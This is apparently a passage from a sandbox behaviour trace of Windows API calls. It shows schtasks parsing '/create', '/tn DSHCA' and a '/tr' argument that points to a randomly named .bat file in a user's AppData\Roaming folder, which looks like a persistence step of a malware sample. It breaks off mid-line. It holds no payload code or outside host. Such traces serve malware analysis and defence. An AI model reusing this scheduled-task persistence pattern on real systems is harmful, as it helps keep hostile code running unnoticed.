[0288.385] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.385] lstrlenW (lpString="|create|") returned 8 [0288.385] lstrlenW (lpString="|tn|") returned 4 [0288.385] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0288.385] RtlRestoreLastWin32Error () returned 0x490 [0288.385] lstrlenW (lpString="?") returned 1 [0288.385] lstrlenW (lpString="?") returned 1 [0288.385] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.385] lstrlenW (lpString="tn") returned 2 [0288.385] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.385] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|?|") returned 3 [0288.385] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.385] lstrlenW (lpString="|?|") returned 3 [0288.385] lstrlenW (lpString="|tn|") returned 4 [0288.385] RtlRestoreLastWin32Error () returned 0x490 [0288.385] lstrlenW (lpString="s") returned 1 [0288.385] lstrlenW (lpString="s") returned 1 [0288.385] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.386] lstrlenW (lpString="tn") returned 2 [0288.386] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.386] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|s|") returned 3 [0288.386] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.386] lstrlenW (lpString="|s|") returned 3 [0288.386] lstrlenW (lpString="|tn|") returned 4 [0288.386] RtlRestoreLastWin32Error () returned 0x490 [0288.386] lstrlenW (lpString="u") returned 1 [0288.386] lstrlenW (lpString="u") returned 1 [0288.386] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.386] lstrlenW (lpString="tn") returned 2 [0288.386] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.386] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|u|") returned 3 [0288.386] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.386] lstrlenW (lpString="|u|") returned 3 [0288.386] lstrlenW (lpString="|tn|") returned 4 [0288.386] RtlRestoreLastWin32Error () returned 0x490 [0288.386] lstrlenW (lpString="p") returned 1 [0288.386] lstrlenW (lpString="p") returned 1 [0288.386] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.386] lstrlenW (lpString="tn") returned 2 [0288.386] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.386] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|p|") returned 3 [0288.386] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.386] lstrlenW (lpString="|p|") returned 3 [0288.386] lstrlenW (lpString="|tn|") returned 4 [0288.386] RtlRestoreLastWin32Error () returned 0x490 [0288.386] lstrlenW (lpString="ru") returned 2 [0288.386] lstrlenW (lpString="ru") returned 2 [0288.386] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.386] lstrlenW (lpString="tn") returned 2 [0288.386] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.386] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ru|") returned 4 [0288.386] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.386] lstrlenW (lpString="|ru|") returned 4 [0288.386] lstrlenW (lpString="|tn|") returned 4 [0288.386] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0288.386] RtlRestoreLastWin32Error () returned 0x490 [0288.386] lstrlenW (lpString="rp") returned 2 [0288.387] lstrlenW (lpString="rp") returned 2 [0288.387] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] lstrlenW (lpString="tn") returned 2 [0288.387] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|rp|") returned 4 [0288.387] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.387] lstrlenW (lpString="|rp|") returned 4 [0288.387] lstrlenW (lpString="|tn|") returned 4 [0288.387] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0288.387] RtlRestoreLastWin32Error () returned 0x490 [0288.387] lstrlenW (lpString="sc") returned 2 [0288.387] lstrlenW (lpString="sc") returned 2 [0288.387] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] lstrlenW (lpString="tn") returned 2 [0288.387] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.387] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.387] lstrlenW (lpString="|sc|") returned 4 [0288.387] lstrlenW (lpString="|tn|") returned 4 [0288.387] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0288.387] RtlRestoreLastWin32Error () returned 0x490 [0288.387] lstrlenW (lpString="mo") returned 2 [0288.387] lstrlenW (lpString="mo") returned 2 [0288.387] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] lstrlenW (lpString="tn") returned 2 [0288.387] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.387] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.387] lstrlenW (lpString="|mo|") returned 4 [0288.387] lstrlenW (lpString="|tn|") returned 4 [0288.387] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0288.387] RtlRestoreLastWin32Error () returned 0x490 [0288.387] lstrlenW (lpString="d") returned 1 [0288.387] lstrlenW (lpString="d") returned 1 [0288.387] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] lstrlenW (lpString="tn") returned 2 [0288.387] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|d|") returned 3 [0288.387] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.387] lstrlenW (lpString="|d|") returned 3 [0288.387] lstrlenW (lpString="|tn|") returned 4 [0288.387] RtlRestoreLastWin32Error () returned 0x490 [0288.387] lstrlenW (lpString="m") returned 1 [0288.387] lstrlenW (lpString="m") returned 1 [0288.387] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] lstrlenW (lpString="tn") returned 2 [0288.387] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.387] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|m|") returned 3 [0288.388] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.388] lstrlenW (lpString="|m|") returned 3 [0288.388] lstrlenW (lpString="|tn|") returned 4 [0288.388] RtlRestoreLastWin32Error () returned 0x490 [0288.388] lstrlenW (lpString="i") returned 1 [0288.388] lstrlenW (lpString="i") returned 1 [0288.388] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.388] lstrlenW (lpString="tn") returned 2 [0288.388] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.388] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|i|") returned 3 [0288.388] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.388] lstrlenW (lpString="|i|") returned 3 [0288.388] lstrlenW (lpString="|tn|") returned 4 [0288.388] RtlRestoreLastWin32Error () returned 0x490 [0288.388] lstrlenW (lpString="tn") returned 2 [0288.388] lstrlenW (lpString="tn") returned 2 [0288.388] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.388] lstrlenW (lpString="tn") returned 2 [0288.388] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.388] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.388] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.388] lstrlenW (lpString="|tn|") returned 4 [0288.388] lstrlenW (lpString="|tn|") returned 4 [0288.388] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0288.388] RtlRestoreLastWin32Error () returned 0x0 [0288.388] RtlRestoreLastWin32Error () returned 0x0 [0288.388] lstrlenW (lpString="DSHCA") returned 5 [0288.388] lstrlenW (lpString="-/") returned 2 [0288.388] StrChrIW (lpStart="-/", wMatch=0x52b0044) returned 0x0 [0288.388] RtlRestoreLastWin32Error () returned 0x490 [0288.388] RtlRestoreLastWin32Error () returned 0x490 [0288.388] RtlRestoreLastWin32Error () returned 0x0 [0288.388] lstrlenW (lpString="DSHCA") returned 5 [0288.388] StrChrIW (lpStart="DSHCA", wMatch=0x3a) returned 0x0 [0288.388] RtlRestoreLastWin32Error () returned 0x490 [0288.388] RtlRestoreLastWin32Error () returned 0x0 [0288.388] lstrlenW (lpString="DSHCA") returned 5 [0288.388] RtlRestoreLastWin32Error () returned 0x0 [0288.388] RtlRestoreLastWin32Error () returned 0x0 [0288.388] lstrlenW (lpString="/tr") returned 3 [0288.388] lstrlenW (lpString="-/") returned 2 [0288.388] StrChrIW (lpStart="-/", wMatch=0x52b002f) returned="/" [0288.388] lstrlenW (lpString="create") returned 6 [0288.388] lstrlenW (lpString="create") returned 6 [0288.388] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.388] lstrlenW (lpString="tr") returned 2 [0288.388] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.388] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x9, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|create|") returned 8 [0288.388] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.388] lstrlenW (lpString="|create|") returned 8 [0288.388] lstrlenW (lpString="|tr|") returned 4 [0288.389] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0288.389] RtlRestoreLastWin32Error () returned 0x490 [0288.389] lstrlenW (lpString="?") returned 1 [0288.389] lstrlenW (lpString="?") returned 1 [0288.389] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] lstrlenW (lpString="tr") returned 2 [0288.389] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|?|") returned 3 [0288.389] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.389] lstrlenW (lpString="|?|") returned 3 [0288.389] lstrlenW (lpString="|tr|") returned 4 [0288.389] RtlRestoreLastWin32Error () returned 0x490 [0288.389] lstrlenW (lpString="s") returned 1 [0288.389] lstrlenW (lpString="s") returned 1 [0288.389] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] lstrlenW (lpString="tr") returned 2 [0288.389] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|s|") returned 3 [0288.389] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.389] lstrlenW (lpString="|s|") returned 3 [0288.389] lstrlenW (lpString="|tr|") returned 4 [0288.389] RtlRestoreLastWin32Error () returned 0x490 [0288.389] lstrlenW (lpString="u") returned 1 [0288.389] lstrlenW (lpString="u") returned 1 [0288.389] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] lstrlenW (lpString="tr") returned 2 [0288.389] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|u|") returned 3 [0288.389] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.389] lstrlenW (lpString="|u|") returned 3 [0288.389] lstrlenW (lpString="|tr|") returned 4 [0288.389] RtlRestoreLastWin32Error () returned 0x490 [0288.389] lstrlenW (lpString="p") returned 1 [0288.389] lstrlenW (lpString="p") returned 1 [0288.389] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] lstrlenW (lpString="tr") returned 2 [0288.389] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|p|") returned 3 [0288.389] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.389] lstrlenW (lpString="|p|") returned 3 [0288.389] lstrlenW (lpString="|tr|") returned 4 [0288.389] RtlRestoreLastWin32Error () returned 0x490 [0288.389] lstrlenW (lpString="ru") returned 2 [0288.389] lstrlenW (lpString="ru") returned 2 [0288.389] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] lstrlenW (lpString="tr") returned 2 [0288.389] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.389] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|ru|") returned 4 [0288.390] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.390] lstrlenW (lpString="|ru|") returned 4 [0288.390] lstrlenW (lpString="|tr|") returned 4 [0288.390] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0288.390] RtlRestoreLastWin32Error () returned 0x490 [0288.390] lstrlenW (lpString="rp") returned 2 [0288.390] lstrlenW (lpString="rp") returned 2 [0288.390] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.390] lstrlenW (lpString="tr") returned 2 [0288.390] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.390] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|rp|") returned 4 [0288.390] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.390] lstrlenW (lpString="|rp|") returned 4 [0288.390] lstrlenW (lpString="|tr|") returned 4 [0288.390] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0288.390] RtlRestoreLastWin32Error () returned 0x490 [0288.390] lstrlenW (lpString="sc") returned 2 [0288.390] lstrlenW (lpString="sc") returned 2 [0288.390] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.390] lstrlenW (lpString="tr") returned 2 [0288.390] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.390] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|sc|") returned 4 [0288.390] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.390] lstrlenW (lpString="|sc|") returned 4 [0288.390] lstrlenW (lpString="|tr|") returned 4 [0288.390] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0288.390] RtlRestoreLastWin32Error () returned 0x490 [0288.390] lstrlenW (lpString="mo") returned 2 [0288.390] lstrlenW (lpString="mo") returned 2 [0288.390] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.390] lstrlenW (lpString="tr") returned 2 [0288.390] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.390] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|mo|") returned 4 [0288.390] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.390] lstrlenW (lpString="|mo|") returned 4 [0288.390] lstrlenW (lpString="|tr|") returned 4 [0288.390] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0288.390] RtlRestoreLastWin32Error () returned 0x490 [0288.390] lstrlenW (lpString="d") returned 1 [0288.390] lstrlenW (lpString="d") returned 1 [0288.390] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.390] lstrlenW (lpString="tr") returned 2 [0288.390] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.390] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|d|") returned 3 [0288.390] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.390] lstrlenW (lpString="|d|") returned 3 [0288.390] lstrlenW (lpString="|tr|") returned 4 [0288.390] RtlRestoreLastWin32Error () returned 0x490 [0288.390] lstrlenW (lpString="m") returned 1 [0288.391] lstrlenW (lpString="m") returned 1 [0288.391] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.391] lstrlenW (lpString="tr") returned 2 [0288.391] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.391] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|m|") returned 3 [0288.391] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.391] lstrlenW (lpString="|m|") returned 3 [0288.391] lstrlenW (lpString="|tr|") returned 4 [0288.391] RtlRestoreLastWin32Error () returned 0x490 [0288.391] lstrlenW (lpString="i") returned 1 [0288.391] lstrlenW (lpString="i") returned 1 [0288.391] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.391] lstrlenW (lpString="tr") returned 2 [0288.391] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.391] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x4, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|i|") returned 3 [0288.391] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.391] lstrlenW (lpString="|i|") returned 3 [0288.391] lstrlenW (lpString="|tr|") returned 4 [0288.391] RtlRestoreLastWin32Error () returned 0x490 [0288.391] lstrlenW (lpString="tn") returned 2 [0288.391] lstrlenW (lpString="tn") returned 2 [0288.391] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.391] lstrlenW (lpString="tr") returned 2 [0288.391] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.391] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tn|") returned 4 [0288.391] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.391] lstrlenW (lpString="|tn|") returned 4 [0288.391] lstrlenW (lpString="|tr|") returned 4 [0288.391] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0288.391] RtlRestoreLastWin32Error () returned 0x490 [0288.391] lstrlenW (lpString="tr") returned 2 [0288.391] lstrlenW (lpString="tr") returned 2 [0288.391] _memicmp (_Buf1=0xde75f0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.391] lstrlenW (lpString="tr") returned 2 [0288.391] _memicmp (_Buf1=0xde76b0, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.391] _vsnwprintf (in: _Buffer=0xde9340, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.391] _vsnwprintf (in: _Buffer=0xde92c0, _BufferCount=0x5, _Format="|%s|", _ArgList=0xcccd20 | out: _Buffer="|tr|") returned 4 [0288.391] lstrlenW (lpString="|tr|") returned 4 [0288.391] lstrlenW (lpString="|tr|") returned 4 [0288.391] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0288.391] RtlRestoreLastWin32Error () returned 0x0 [0288.391] RtlRestoreLastWin32Error () returned 0x0 [0288.391] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0288.391] lstrlenW (lpString="-/") returned 2 [0288.391] StrChrIW (lpStart="-/", wMatch=0x52b0043) returned 0x0 [0288.391] RtlRestoreLastWin32Error () returned 0x490 [0288.391] RtlRestoreLastWin32Error () returned 0x490 [0288.391] RtlRestoreLastWin32Error () returned 0x0 [0288.391] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0288.392] StrChrIW (lpStart="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat", wMatch=0x3a) returned=":\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat" [0288.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0288.392] _memicmp (_Buf1=0xde7638, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.392] _memicmp (_Buf1=0xde76c8, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.392] RtlRestoreLastWin32Error () returned 0x7a [0288.392] RtlRestoreLastWin32Error () returned 0x0 [0288.392] RtlRestoreLastWin32Error () returned 0x0 [0288.392] lstrlenW (lpString="C") returned 1 [0288.392] RtlRestoreLastWin32Error () returned 0x490 [0288.392] RtlRestoreLastWin32Error () returned 0x0 [0288.392] _memicmp (_Buf1=0xde7620, _Buf2=0x1082708, _Size=0x7) returned 0 [0288.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0288.392] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\cKJ5Qstc.bat") returned 50 [0288.392] lstrlenW (lpString=" \x09") returned 2 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x49) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x36) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x50) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0288.392] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x6d) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x67) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x4a) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x35) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x51) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x2e) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x62) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0288.393] StrChrW (lpStart=" \x09", 